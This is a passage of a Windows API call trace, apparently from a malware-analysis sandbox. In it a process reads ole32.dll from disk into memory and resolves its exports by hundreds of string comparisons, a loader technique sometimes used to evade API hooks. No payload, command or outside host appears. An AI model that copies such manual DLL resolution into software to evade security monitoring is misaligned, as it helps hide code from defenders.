0x1d [0125.444] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0125.444] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0125.445] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0125.445] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0125.445] GetProcessHeap () returned 0x530000 [0125.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x142d00) returned 0x4117040 [0125.450] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0125.450] ReadFile (in: hFile=0x140, lpBuffer=0x4117040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4117040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0125.680] CloseHandle (hObject=0x140) returned 1 [0125.680] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0125.680] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0125.681] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0125.681] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0125.681] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0125.681] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0125.681] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0125.681] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0125.681] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0125.681] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0125.681] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0125.681] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0125.682] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0125.682] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0125.682] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0125.682] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0125.682] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0125.682] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0125.682] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0125.682] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0125.683] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0125.683] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0125.683] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0125.683] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0125.683] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0125.683] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0125.683] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0125.684] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0125.684] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0125.684] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0125.684] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0125.684] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0125.684] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0125.685] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0125.685] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0125.685] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0125.685] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0125.685] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0125.685] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0125.685] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0125.685] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0125.685] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0125.685] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0125.686] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0125.686] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0125.687] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0125.687] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0125.688] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 